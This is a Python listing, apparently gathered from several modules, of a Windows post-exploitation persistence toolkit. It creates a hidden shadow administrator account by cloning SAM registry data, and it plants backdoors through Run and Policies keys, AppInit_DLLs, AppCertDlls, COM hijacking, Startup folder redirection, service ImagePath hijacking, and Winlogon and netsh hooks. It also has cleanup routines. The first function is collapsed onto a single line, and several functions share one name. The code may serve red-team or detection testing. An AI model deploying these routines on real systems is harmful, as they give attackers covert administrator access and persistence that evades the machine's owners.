def set_account(username,password): create_accout(username,password) #保存账号的类型 account_type = get_account_num(username) root = pyregedit.HKEY_LOCAL_MACHINE path = r"SAM\SAM\Domains\Account\Users\\"+'00000'+str(hex(account_type))[2:] reg = pyregedit.RegEdit(root,path) #判断键是否存在 if reg.check_key(): admin_F = get_admin_account_value() V = reg.get_value("V")[0] # ForcePasswordReset = reg.get_value("ForcePasswordReset")[0] # SupplementalCredentials = reg.get_value("SupplementalCredentials")[0] else: logger.error("用户不存在") return delete_accout(username) #恢复注册表 reg.create_value("F",pyregedit.REG_BINARY,admin_F) reg.create_value("V",pyregedit.REG_BINARY,V) # reg.create_value("ForcePasswordReset",pyregedit.REG_BINARY,ForcePasswordReset) # reg.create_value("SupplementalCredentials",pyregedit.REG_BINARY,SupplementalCredentials) path = r"SAM\SAM\Domains\Account\Users\Names\\" + username reg = pyregedit.RegEdit(root, path) reg.create_value("", account_type, "".encode()) logger.info('影子账号创建成功')
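def clear_system_startup_folder():
    """Remove the injected ``Startup`` value from both HKLM shell-folder keys.

    Undoes set_system_startup_folder_shell: deletes the ``Startup`` value
    under ``Explorer\\User Shell Folders`` and ``Explorer\\Shell Folders`` in
    HKLM. The value is deleted rather than reset because the machine hive
    normally carries no per-user ``Startup`` entry (its all-users folder is
    ``Common Startup``).

    As in the original, a key that cannot be opened is reported as a
    privilege problem and aborts the rest of the cleanup. Changes: a delete
    that raises is logged with its traceback instead of being swallowed by a
    bare ``except:`` (which also ate KeyboardInterrupt), and a delete that
    reports "value not present" (falsy return, the convention clear_system
    relies on) is no longer logged as a success.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    targets = (
        (r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders",
         'User Shell Folders Startup'),
        (r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",
         'Shell Folders Startup'),
    )
    for path, label in targets:
        reg = pyregedit.RegEdit(root, path)
        if not reg.check_key():
            # Both keys exist on every install; failing to open them for
            # write almost always means the token is not elevated.
            logger.error('需要管理员权限!')
            return
        try:
            deleted = reg.delete_value('Startup')
        except Exception:
            logger.exception(label + ' 清除失败')
            continue
        if deleted:
            logger.info(label + ' 清除成功')
        else:
            logger.error(label + ' 清除失败')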
def init():
    """Ensure HKCU ...\\CLSID\\{b5f8350b-...}\\InprocServer32 exists; return a RegEdit bound to it.

    COM consults HKCU\\Software\\Classes before HKLM when resolving a CLSID,
    so a per-user InprocServer32 entry shadows the machine-wide registration
    without administrator rights (COM hijacking). Only the key skeleton is
    created here; the DLL path written into InprocServer32 is the caller's
    responsibility, and which process loads this CLSID is not established by
    this code. NOTE(review): this listing holds several functions named
    ``init`` -- presumably from separate modules, since within one module only
    the last definition would survive.
    """
    root = pyregedit.HKEY_CURRENT_USER
    clsid_path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}"
    server_path = clsid_path + r"\InprocServer32"

    clsid = pyregedit.RegEdit(root, clsid_path)
    if not clsid.check_key():
        clsid.create_key()

    server = pyregedit.RegEdit(root, server_path)
    if not server.check_key():
        server.create_key()
        logger.info('创建了InprocServer32')
    return server
def init():
    """Ensure HKCU ...\\CLSID\\{42aedc87-...}\\InprocServer32 exists; return a RegEdit bound to it.

    Same per-user COM-hijack skeleton as the {b5f8350b-...} variant. The
    matching cleanup is clear_com_explorer_Hijack, so this CLSID is presumably
    one explorer.exe loads -- not verified here. Only the keys are created; the
    InprocServer32 DLL path is left to the caller. NOTE(review): several
    functions in this listing are named ``init``; in one module only the last
    would survive, so these are presumably separate modules.
    """
    root = pyregedit.HKEY_CURRENT_USER
    clsid_path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}"
    server_path = clsid_path + r"\InprocServer32"

    clsid = pyregedit.RegEdit(root, clsid_path)
    if not clsid.check_key():
        clsid.create_key()

    server = pyregedit.RegEdit(root, server_path)
    if not server.check_key():
        server.create_key()
        logger.info('创建了InprocServer32')
    return server
def clear_AppCertDlls():
    """Delete the whole HKLM ...\\Session Manager\\AppCertDlls key.

    Reverses set_AppCertDlls. This removes the key and every value under it,
    not only the one the setter wrote; since the key is normally absent on a
    stock install, that is usually the intended result. Needs an elevated
    token; a key that cannot be opened is reported as "does not exist".
    """
    appcert = pyregedit.RegEdit(
        pyregedit.HKEY_LOCAL_MACHINE,
        r"System\CurrentControlSet\Control\Session Manager\AppCertDlls",
    )
    if not appcert.check_key():
        logger.info('AppCertDlls键不存在')
        return
    appcert.delete_current_key()
    logger.info('清除')
def get_admin_account_value():
    """Return the raw ``F`` blob of HKLM\\SAM\\...\\Users\\000001F4, or None.

    000001F4 is RID 500, the built-in Administrator. The SAM hive is only
    readable with SYSTEM-level access, so None here usually means the
    process lacks that, not that the key is missing. ``get_value`` is indexed
    as (data, type) elsewhere in this file; only the data is returned.
    """
    admin_key = pyregedit.RegEdit(
        pyregedit.HKEY_LOCAL_MACHINE,
        r"SAM\SAM\Domains\Account\Users\000001F4",
    )
    if not admin_key.check_key():
        return None
    return admin_key.get_value("F")[0]
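def clear_account(username):
    """Remove the SAM registry entries left behind by set_account.

    Deletes ``Users\\Names\\<username>`` and the matching ``Users\\<rid>`` key
    under HKLM\\SAM, where the RID comes from get_account_num. Needs
    SYSTEM-level access to the SAM hive. Each deletion is best-effort -- a
    key that is already gone is not an error -- but only ordinary exceptions
    are ignored now; the original bare ``except:`` also swallowed
    KeyboardInterrupt and SystemExit.

    The RID key name is deliberately built exactly as set_account builds it
    ('00000' + lowercase hex, doubled backslash included) so the two agree;
    fixing the width for RIDs >= 0x1000 would have to be done in both.

    Args:
        username: name of the shadow account to remove.
    """
    account_type = get_account_num(username)
    if not account_type:
        logger.info("未植入影子后门")
        return
    root = pyregedit.HKEY_LOCAL_MACHINE
    targets = (
        r"SAM\SAM\Domains\Account\Users\Names\\" + username,
        r"SAM\SAM\Domains\Account\Users\\" + '00000' + str(hex(account_type))[2:],
    )
    for path in targets:
        try:
            pyregedit.RegEdit(root, path).delete_current_key()
        except Exception:
            # Best effort: the key may already be gone or partially removed.
            pass
    logger.info("影子账号清除成功")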
def clear_AppInit_DLLs():
    """Blank AppInit_DLLs and set LoadAppInit_DLLs to 0 under HKLM ...\\Windows.

    Reverses set_AppInit_DLLs. Nothing was backed up, so this does not
    restore whatever the two values held before the setter ran -- it writes
    an empty list and a zero flag unconditionally. The key always exists, so
    a failed open is reported as a missing-privileges problem.
    """
    windows_key = pyregedit.RegEdit(
        pyregedit.HKEY_LOCAL_MACHINE,
        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",
    )
    if not windows_key.check_key():
        logger.info('需要管理员权限!')
        return
    windows_key.create_value('AppInit_DLLs', pyregedit.REG_SZ, "")
    windows_key.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x0)
    logger.info('清除')
def get_account_num(username):
    """Return the RID recorded for username under HKLM\\SAM ...\\Users\\Names, or None.

    The Names\\<user> key holds one unnamed value whose *type* field (second
    element of get_value's result, as set_account writes it) is the RID.
    None when the key is absent or the SAM hive cannot be opened (needs
    SYSTEM-level access). As in set_account, the raw string leaves a doubled
    backslash before the user name.
    """
    names_key = pyregedit.RegEdit(
        pyregedit.HKEY_LOCAL_MACHINE,
        r"SAM\SAM\Domains\Account\Users\Names\\" + username,
    )
    if not names_key.check_key():
        return None
    return names_key.get_value("")[1]
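def clear_user():
    """Remove the per-user (HKCU) Run-key persistence written by the set_user_* helpers.

    In order: the ``value_name`` entry under ``CurrentVersion\\Run`` and
    ``CurrentVersion\\RunOnce``, then the whole ``RunServices`` and
    ``RunServicesOnce`` keys (normally absent on current Windows, so deleting
    them outright is the cleanest undo -- anything else that lives there goes
    too). ``value_name`` is a module-level global, not a parameter.

    Changes from the original: failures are logged with a traceback instead
    of a bare ``except:`` that also swallowed KeyboardInterrupt, and the
    RunOnce branch checks the key opens before deleting from it.
    """
    root = pyregedit.HKEY_CURRENT_USER
    base = r"Software\Microsoft\Windows\CurrentVersion"

    run = pyregedit.RegEdit(root, base + r"\Run")
    if run.check_key():
        try:
            # delete_value() returns falsy when the value was not present.
            if run.delete_value(value_name):
                logger.info('Run 删除成功')
            else:
                logger.error('没有植入Run 后门')
        except Exception:
            logger.exception('Run 删除失败')

    run_once = pyregedit.RegEdit(root, base + r"\RunOnce")
    if run_once.check_key() and run_once.delete_value(value_name):
        logger.info('RunOnce 删除成功')

    for sub, label in ((r"\RunServices", 'RunServices'),
                       (r"\RunServicesOnce", 'RunServicesOnce')):
        reg = pyregedit.RegEdit(root, base + sub)
        if not reg.check_key():
            continue
        try:
            reg.delete_current_key()
        except Exception:
            logger.exception(label + ' 删除失败')
        else:
            logger.info(label + ' 删除成功')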
def set_user_startup_folder_shell(startup_path: str) -> None:
    """Redirect this user's Startup folder (HKCU Explorer\\Shell Folders) to startup_path.

    Whatever directory Explorer believes is "Startup" has its contents
    launched at logon, so pointing the value at a controlled directory is
    Run-key-style persistence. Only ``Shell Folders`` is written; the
    ``User Shell Folders`` entry, which Microsoft documents as the source the
    Shell Folders cache is rebuilt from, is untouched -- so how long the
    redirection survives is not something this code establishes (the
    cleanup, clear_user_startup_folder, resets both keys).

    Args:
        startup_path: directory to register as the Startup folder (REG_SZ).
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        pass
    else:
        reg.create_key()
    try:
        reg.create_value('Startup', pyregedit.REG_SZ, startup_path)
        logger.info('Shell Folders Startup 修改成功')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        logger.error('Shell Folders Startup 修改失败')
def set_system_startup_folder_shell(startup_path: str) -> None:
    """Write startup_path as the ``Startup`` value of HKLM Explorer\\Shell Folders.

    Machine-wide counterpart of set_user_startup_folder_shell. Caveats: HKLM
    needs an elevated token, and any failed check_key() is reported as a
    privilege problem; the machine hive normally names its all-users startup
    folder ``Common Startup``, and whether Explorer honours a ``Startup``
    value placed in HKLM is not established by this code (the cleanup,
    clear_system_startup_folder, simply deletes the value again).

    Args:
        startup_path: directory to register as the Startup folder (REG_SZ).
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        pass
    else:
        logger.error('需要管理员权限!')
        return
    try:
        reg.create_value('Startup', pyregedit.REG_SZ, startup_path)
        logger.info('Shell Folders Startup 修改成功')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        logger.error('Shell Folders Startup 修改失败')
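def clear_user_startup_folder():
    """Point the current user's Startup folder back at its stock location.

    Reverses set_user_startup_folder_shell by rewriting the ``Startup`` value
    in both HKCU ``Explorer\\User Shell Folders`` and ``Explorer\\Shell
    Folders``. Windows keeps the two in different forms: User Shell Folders
    holds the unexpanded template as REG_EXPAND_SZ, Shell Folders holds the
    already-expanded absolute path as REG_SZ. The original wrote the
    ``%USERPROFILE%`` template as REG_SZ into both, leaving a value Windows
    will not expand; this version writes each key in its native form.
    Expansion uses this process's environment, which is consistent because
    HKCU is this process's user hive as well. Failures are logged with a
    traceback rather than swallowed by a bare ``except:``.
    """
    import os

    template = r'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    root = pyregedit.HKEY_CURRENT_USER
    base = r"Software\Microsoft\Windows\CurrentVersion\Explorer"
    restores = (
        (base + r"\User Shell Folders", 'User Shell Folders',
         pyregedit.REG_EXPAND_SZ, template),
        (base + r"\Shell Folders", 'Shell Folders',
         pyregedit.REG_SZ, os.path.expandvars(template)),
    )
    for path, label, value_type, value in restores:
        reg = pyregedit.RegEdit(root, path)
        if not reg.check_key():
            logger.info(label + ' 键值不存在')
            continue
        try:
            reg.create_value('Startup', value_type, value)
        except Exception:
            logger.exception(label + ' Startup 清除失败')
        else:
            logger.info(label + ' Startup 清除成功')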
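def set_user_runonce(cmd):
    """Write cmd as value ``value_name`` under HKCU ...\\RunOnce.

    RunOnce entries run at this user's next logon and are then removed by
    Windows, so this is one-shot persistence. ``value_name`` is a
    module-level global.

    Fix: when the RunOnce key could not be opened the original called
    ``exit(0)`` -- terminating the whole process, with a *success* status,
    from inside a helper. This version logs the error and returns like the
    other set_* helpers. A failed write is logged with its traceback instead
    of being swallowed by a bare ``except:``.

    Args:
        cmd: command line stored as REG_SZ.
    """
    reg = pyregedit.RegEdit(
        pyregedit.HKEY_CURRENT_USER,
        r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
    )
    if not reg.check_key():
        logger.error('RunOnce 键不存在')
        return
    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
    except Exception:
        logger.exception('插入注册表失败')
    else:
        logger.info('插入注册表成功')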
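def clear_com_explorer_Hijack():
    """Undo the per-user COM hijack of CLSID {42aedc87-...}.

    Removes HKCU ``Software\\Classes\\CLSID\\{42aedc87-...}`` -- the
    InprocServer32 subkey first, because a key that still has subkeys
    cannot be deleted -- so COM falls back to the machine-wide
    registration. Unlike clear_com_Hijack, no staged DLL directory is
    removed here. Failures are logged with a traceback instead of being
    swallowed by a bare ``except:`` (which also ate KeyboardInterrupt).
    """
    reg = pyregedit.RegEdit(
        pyregedit.HKEY_CURRENT_USER,
        r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}",
    )
    if not reg.check_key():
        logger.info('该后门没有植入')
        return
    try:
        reg.delete_sub_key('InprocServer32')
        reg.delete_current_key()
    except Exception:
        logger.exception('清除失败')
    else:
        logger.info('清除成功')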
def set_AppInit_DLLs(cmd: str) -> None:
    """Register cmd as an AppInit DLL and switch AppInit loading on (HKLM).

    Writes ``AppInit_DLLs = cmd`` and ``LoadAppInit_DLLs = 1`` under
    ``HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows``;
    user32.dll loads the listed DLLs into every process that loads user32.
    Caveats a tester should know: the existing AppInit_DLLs list is
    overwritten, not appended to, and nothing is backed up for
    clear_AppInit_DLLs to restore; on Windows 8+ with Secure Boot enabled
    the mechanism is disabled regardless of these values, and
    ``RequireSignedAppInit_DLLs`` may additionally demand a signed DLL.
    The key exists on every system, so a failed check_key() almost
    certainly means the process is not elevated (hence the log text).

    Args:
        cmd: path of the DLL to load -- AppInit_DLLs takes DLL paths, not a
            command line, despite the parameter name.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
    reg = pyregedit.RegEdit(root,path)
    # Does the key open? It always exists, so failure means no elevation.
    if reg.check_key():
        try:
            reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, cmd)
            reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x01)
            logger.info('插入注册表成功')
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
            logger.error('插入注册表失败')
    else:
        logger.info('需要管理员权限!')
        return
def set_user_RunServicesOnce(cmd: str) -> None:
    """Write cmd as value ``value_name`` under HKCU ...\\RunServicesOnce, creating the key.

    NOTE(review): RunServices / RunServicesOnce were processed by the
    Windows 9x/Me shell; NT-based Windows does not read them, so on any
    current system this leaves an inert value behind -- confirm before
    relying on it. ``value_name`` is a module-level global. The "key
    created" message is logged at error level although it is not an error.

    Args:
        cmd: command line stored as REG_SZ.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        pass
    else:
        # The key is absent on current Windows, so this is the usual branch.
        reg.create_key()
        logger.error('创建 RunServicesOnce 键值')
    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_system_Explorer(cmd: str) -> None:
    """Write cmd as value ``value_name`` under HKLM ...\\Policies\\Explorer\\Run, creating the key.

    Policies\\Explorer\\Run is the Group-Policy-managed counterpart of the Run
    key: Explorer launches each value in it at logon, for every user. The
    key is normally absent, so create_key() is the usual path; it lives under
    HKLM, so the process must be elevated -- an access-denied create_key()
    is not caught here and propagates. ``value_name`` is a module-level
    global. The "key created" message is logged at error level although it
    is not an error.

    Args:
        cmd: command line stored as REG_SZ.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        pass
    else:
        reg.create_key()
        logger.error('创建 Explorer\Run 键值')
    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_system_RunOnceEx_dll(cmd: str) -> None:
    """Write cmd as value ``value_name`` under HKLM ...\\RunOnceEx\\0001\\Depend.

    RunOnceEx sections are processed at the next logon; per Microsoft's
    RunOnceEx documentation, values under a section's ``Depend`` subkey name
    DLLs that are loaded while the section runs -- which is why this helper
    is named *_dll: cmd should be a DLL path, not a command line. The key
    chain is created when absent; it is under HKLM, so an elevated token is
    required and an access-denied create_key() propagates uncaught.
    ``value_name`` is a module-level global. The "key created" message is
    logged at error level although it is not an error.

    Args:
        cmd: DLL path stored as REG_SZ.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        pass
    else:
        reg.create_key()
        logger.error(r'创建 RunOnceEx\0001\Depend 键值')
    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_AppCertDlls(cmd: str) -> None:
    """Register cmd under HKLM ...\\Session Manager\\AppCertDlls, creating the key.

    Each value under AppCertDlls names a DLL that is loaded into processes
    calling the CreateProcess family. Two things worth knowing: the key is
    absent on a stock install, so its mere presence is a strong detection
    signal; and the value is created with the *name* 'Default' -- a named
    value, not the key's unnamed default value ("") -- which works because
    every value under the key is honoured, but may surprise whoever inspects
    it. HKLM\\System needs an elevated token; an access-denied create_key()
    propagates uncaught. cmd should be a DLL path, not a command line.

    Args:
        cmd: DLL path stored as REG_SZ.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls"
    reg = pyregedit.RegEdit(root, path)
    # Does the key exist?
    if reg.check_key():
        pass
    else:
        # Create it (normally absent, so this is the usual branch).
        reg.create_key()
        logger.info('创建AppCertDlls键')
    try:
        reg.create_value('Default', pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_user_Explorer(cmd: str) -> None:
    """Write cmd as value ``value_name`` under HKCU ...\\Policies\\Explorer\\Run, creating the key.

    Per-user twin of set_system_Explorer. No elevation is needed because
    HKCU is the caller's own hive, so the "需要管理员权限" branch is really
    reached through whatever else create_key() can raise -- the bare except
    maps every failure to that message. ``value_name`` is a module-level
    global.

    Args:
        cmd: command line stored as REG_SZ.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        pass
    else:
        try:
            reg.create_key()
            logger.info('创建 Explorer\Run 键值')
        except:
            # NOTE(review): any exception is reported as a privilege problem.
            logger.error('需要管理员权限')
            return
    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
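def clear_com_Hijack():
    """Undo the per-user COM hijack of CLSID {b5f8350b-...}.

    Deletes HKCU ``Software\\Classes\\CLSID\\{b5f8350b-...}`` (InprocServer32
    first, since a key that still has subkeys cannot be deleted) and then
    removes the directory named by the module-level ``defaultpath`` global,
    presumably where the hijacking DLL is staged (not verifiable from this
    function). Registry and file cleanup run in that order, so an rmtree
    failure is reported after the registry entries are already gone.
    Failures are logged with a traceback instead of being swallowed by a
    bare ``except:`` (which also ate KeyboardInterrupt).
    """
    reg = pyregedit.RegEdit(
        pyregedit.HKEY_CURRENT_USER,
        r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}",
    )
    if not reg.check_key():
        logger.info('该后门没有植入')
        return
    try:
        reg.delete_sub_key('InprocServer32')
        reg.delete_current_key()
        if os.path.isdir(defaultpath):
            shutil.rmtree(defaultpath)
    except Exception:
        logger.exception('清除失败')
    else:
        logger.info('清除成功')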
def set_system(cmd: str) -> None:
    """Write cmd as value ``value_name`` under HKLM ...\\CurrentVersion\\Run.

    Classic machine-wide Run-key persistence: the command runs at every
    user's logon. The key always exists, so a failed check_key() is treated
    as "not elevated". ``value_name`` is a module-level global; ``key`` from
    get_key() is fetched and never used.

    Args:
        cmd: command line stored as REG_SZ.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    reg = pyregedit.RegEdit(root, path)
    # Does the key open?
    if reg.check_key():
        # Handle fetched but unused.
        key = reg.get_key()
    else:
        # Key always exists; failure to open means no elevation.
        logger.error('需要管理员权限!')
        return
    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_reg_service(cmd: str, service: str) -> None:
    """Hijack an existing service: point its ImagePath at cmd and make it auto-start.

    Writes, under HKLM ...\\Services\\<service>: ``Start = 2``
    (SERVICE_AUTO_START), ``Type = 0x10`` (SERVICE_WIN32_OWN_PROCESS) and
    ``ImagePath = cmd`` as REG_EXPAND_SZ, the type Windows itself uses for
    that value. The service must already exist (the function refuses
    otherwise). Nothing is backed up, so the original ImagePath/Start/Type
    are lost and no cleanup routine in this file restores them. The SCM
    picks the new values up on the next start of the service, not
    immediately. ObjectName/ErrorControl writes are left commented out.

    Args:
        cmd: executable path or command line written as ImagePath.
        service: name of an existing service key.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"SYSTEM\CurrentControlSet\Services\\" + service
    reg = pyregedit.RegEdit(root, path)
    # Does the service key exist? (needs an elevated token to open for write)
    if reg.check_key():
        # Handle fetched but unused.
        key = reg.get_key()
    else:
        logger.error(service + '服务不存在')
        return
    try:
        # reg.create_value('ErrorControl',pyregedit.REG_DWORD,0x01)
        # reg.create_value('ObjectName',pyregedit.REG_SZ,'LocalSystem')
        reg.create_value('Start', pyregedit.REG_DWORD, 0x02)
        reg.create_value('Type', pyregedit.REG_DWORD, 0x10)
        reg.create_value('ImagePath', pyregedit.REG_EXPAND_SZ, cmd)
        logger.info('修改服务成功')
    except Exception as e:
        logger.error('修改服务失败: ' + str(e))
def HKLM_init():
    """Return a RegEdit bound to HKLM ...\\Winlogon; the key is neither checked nor created.

    Winlogon's values (Userinit, Shell, Notify, ...) are logon-time execution
    hooks, so writes to this key need an elevated token; which value a
    caller writes is not decided here.
    """
    winlogon = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    return pyregedit.RegEdit(pyregedit.HKEY_LOCAL_MACHINE, winlogon)
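def _delete_key_logged(root, path, label, missing_msg=None):
    """Delete the key at root\\path, logging '<label> 删除成功' or '<label> 删除失败'.

    A key that does not exist is not an error here: missing_msg is logged at
    error level when given, otherwise nothing is logged. Only ordinary
    exceptions are caught, and with their traceback.
    """
    reg = pyregedit.RegEdit(root, path)
    if not reg.check_key():
        if missing_msg:
            logger.error(missing_msg)
        return
    try:
        reg.delete_current_key()
    except Exception:
        logger.exception(label + ' 删除失败')
    else:
        logger.info(label + ' 删除成功')


def clear_system():
    """Remove the HKLM persistence written by the set_system* helpers, plus HKCU Policies\\Explorer\\Run.

    In order: the ``value_name`` entry in HKLM ``CurrentVersion\\Run`` and
    ``RunOnce``; the whole ``RunServices`` / ``RunServicesOnce`` keys; the
    whole HKLM ``Policies\\Explorer\\Run`` key; ``RunOnceEx\\0001`` (its
    ``Depend`` subkey first, since a key with subkeys cannot be deleted);
    and finally HKCU ``Policies\\Explorer\\Run``. Deleting whole keys also
    removes any legitimate entries that happen to live there, which is only
    acceptable because those keys are normally absent on a stock install.
    ``value_name`` is a module-level global. A failed open of HKLM Run is
    treated as "not elevated" and aborts everything after it, as before.

    Changes from the original: bare ``except:`` (which also swallowed
    KeyboardInterrupt) replaced by ``except Exception`` with the traceback
    logged, and the RunOnce delete checks the key opens first.
    """
    hklm = pyregedit.HKEY_LOCAL_MACHINE
    hkcu = pyregedit.HKEY_CURRENT_USER
    base = r"Software\Microsoft\Windows\CurrentVersion"

    run = pyregedit.RegEdit(hklm, base + r"\Run")
    if not run.check_key():
        logger.error('Run 需要管理员权限!')
        return
    try:
        # delete_value() returns falsy when the value was not present.
        if run.delete_value(value_name):
            logger.info('Run 删除成功')
        else:
            logger.error('没有植入Run 后门')
    except Exception:
        logger.exception('Run 删除失败')

    run_once = pyregedit.RegEdit(hklm, base + r"\RunOnce")
    if run_once.check_key() and run_once.delete_value(value_name):
        logger.info('RunOnce 删除成功')

    _delete_key_logged(hklm, base + r"\RunServices", 'RunServices')
    _delete_key_logged(hklm, base + r"\RunServicesOnce", 'RunServicesOnce')
    _delete_key_logged(hklm, base + r"\Policies\Explorer\Run", 'Explorer\\Run',
                       missing_msg='没有植入HKLM Explorer\\Run 后门')

    once_ex = pyregedit.RegEdit(hklm, base + r"\RunOnceEx\0001")
    if once_ex.check_key():
        try:
            try:
                once_ex.delete_sub_key('Depend')
                logger.info('RunOnceEx\\0001\\Depend 删除成功')
            except Exception:
                pass  # no Depend subkey: nothing to remove first
            once_ex.delete_current_key()
            logger.info('RunOnceEx\\0001 删除成功')
        except Exception:
            logger.exception('RunOnceEx\\0001 删除失败')
    else:
        logger.error('没有植入 RunOnceEx\\0001 后门')

    _delete_key_logged(hkcu, base + r"\Policies\Explorer\Run", 'Explorer\\Run',
                       missing_msg='没有植入HKCU Explorer\\Run 后门')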
def init():
    """Return a RegEdit bound to HKLM\\SOFTWARE\\Microsoft\\NetSh; the key is neither checked nor created.

    Values under this key register netsh helper DLLs, which netsh loads
    whenever it runs; what to write is left to the caller, and writing here
    needs an elevated token. NOTE(review): several functions in this listing
    are named ``init`` -- presumably from separate modules, since within one
    module only the last definition would survive.
    """
    netsh = r"SOFTWARE\Microsoft\NetSh"
    return pyregedit.RegEdit(pyregedit.HKEY_LOCAL_MACHINE, netsh)
def init():
    """Return a RegEdit bound to HKCU ...\\Winlogon; the key is neither checked nor created.

    Per-user counterpart of HKLM_init. What gets written is up to the
    caller. NOTE(review): only some Winlogon values (``Shell`` is the usual
    one) are honoured from HKCU; others are read from HKLM only -- confirm
    for the value in use. Several functions in this listing are named
    ``init``; presumably they come from separate modules.
    """
    winlogon = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    return pyregedit.RegEdit(pyregedit.HKEY_CURRENT_USER, winlogon)